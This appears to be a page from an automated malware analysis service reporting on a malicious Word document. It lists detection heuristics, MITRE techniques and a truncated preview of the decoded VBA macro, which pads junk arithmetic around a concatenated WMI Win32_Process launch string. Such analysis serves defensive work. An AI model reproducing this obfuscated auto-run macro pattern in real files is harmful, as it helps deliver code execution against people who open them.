MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing a VBA macro. The macro utilizes GetObject and CreateObject to launch the Win32_Process service, indicating an intent to execute arbitrary code. The presence of an AutoOpen macro further suggests immediate execution upon opening the document.
Heuristics 8
-
ClamAV: Doc.Malware.Dpzn-6865731-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dpzn-6865731-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 59882 bytes |
SHA-256: ff10781d62625c89ed3797707e00adaa38430a844fb40b18a23fa4b962a08ce2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "w2_23_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "L674369_"
Function K_8_4__9()
Select Case r648146
Case 126304089
s_21_206 = Log(s_7_902)
m8_287__ = CDate(591794363)
a335_327 = Fix(571383260 + 219603384 + u67__4 - Oct(980013037))
l383__ = Cos(575180968 - Sqr(591490181 - Atn(982722253)) - 159626394 + 52174952)
End Select
Select Case K_3__2__
Case 510689917
u744716 = Log(G390523)
b90__41_ = CDate(907887252)
q02_8_8 = Fix(887055824 + 250168166 + C6391270 - Oct(839325539))
z_2_1914 = Cos(503181716 - Sqr(151443950 - Atn(60775589)) - 637051213 + 592479286)
End Select
Select Case o_17_7
Case 529318114
T60890_ = Log(w_74__6_)
E_9_06 = CDate(994322538)
h_47_22 = Fix(593716621 + 899057164 + W3__38 - Oct(822523561))
E1_630__ = Cos(598628611 - Sqr(8575900 - Atn(98442885)) - 605570074 + 316295651)
End Select
Select Case v015__6_
Case 119678662
d42_0__ = Log(j795__)
S3_234_ = CDate(896711647)
W__6_946 = Fix(610829900 + 275177768 + w1_5_72 - Oct(715675999))
L_6_6561 = Cos(271667209 - Sqr(945602782 - Atn(469718774)) - 164760095 + 481304728)
End Select
Select Case l__458
Case 706093281
G0991130 = Log(N_0_0277)
m1_78_52 = CDate(16496647)
c469___5 = Fix(383423189 + 667902766 + u461_33_ - Oct(48605504))
B2_2130 = Cos(101831635 - Sqr(647120975 - Atn(84278991)) - 248461459 + 707669980)
End Select
Select Case r6992169
Case 741917481
z9_1_0 = Log(m_17_5)
A3295_2_ = CDate(82731819)
J977_8 = Fix(680827371 + 139995649 + z_216__ - Oct(798428670))
N_56703 = Cos(9856 - Sqr(242852637 - Atn(539749946)) - 891111595 + 933033346)
End Select
Select Case t30_56
Case 592406003
o_0_42 = Log(I_175_)
J120848 = CDate(402128769)
s70_5_1 = Fix(429882151 + 535533231 + R0012_ - Oct(660706300))
d4623580 = Cos(589457050 - Sqr(526297301 - Atn(326702811)) - 259196395 + 265703178)
End Select
End Function
Function j__020(Q1719__3, i474_5)
On Error Resume Next
Select Case w92_1_
Case 118525464
s___114 = Log(M2_2_33)
Y0663__ = CDate(108034908)
X0___692 = Fix(718985533 + 127122563 + U__5_6 - Oct(865018474))
d569_279 = Cos(953491808 - Sqr(82360092 - Atn(922630522)) - 136754372 + 352110443)
End Select
Select Case I2_902_1
Case 142352362
Q_31_2 = Log(f905418)
j_51052 = CDate(654124068)
D4_96_13 = Fix(557866621 + 516810733 + l__238 - Oct(758471750))
H53644_ = Cos(612568808 - Sqr(596617279 - Atn(12249210)) - 357186181 + 698380006)
End Select
Select Case R_3__2
Case 733096804
A_4__59 = Log(S816__)
J_5882 = CDate(25045746)
U7853936 = Fix(172737548 + 341305758 + D62_61_ - Oct(192992065))
U00___ = Cos(823251568 - Sqr(466802738 - Atn(623606651)) - 192791008 + 388210032)
End Select
O1_161 = L10517 + "winmgmts:Win32" + "_ProcessStartup" + J597_154
Select Case s_____
Case 236791398
r_8586_1 = Log(H3_2_23)
A32_761 = CDate(740356675)
o6686___ = Fix(926189341 + 286828468 + A37812 - Oct(777091277))
q4__9__ = Cos(123434741 - Sqr(902862888 - Atn(485829908)) - 687825042 + 860295545)
End Select
Select Case i___83
Case 436626345
c6_7_6 = Log(t21___)
M__246 = CDate(164964545)
P_7__468 = Fix(608738104 + 510243722 + W__988_4 - Oct(224020176))
i_5492 = Cos(7263
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.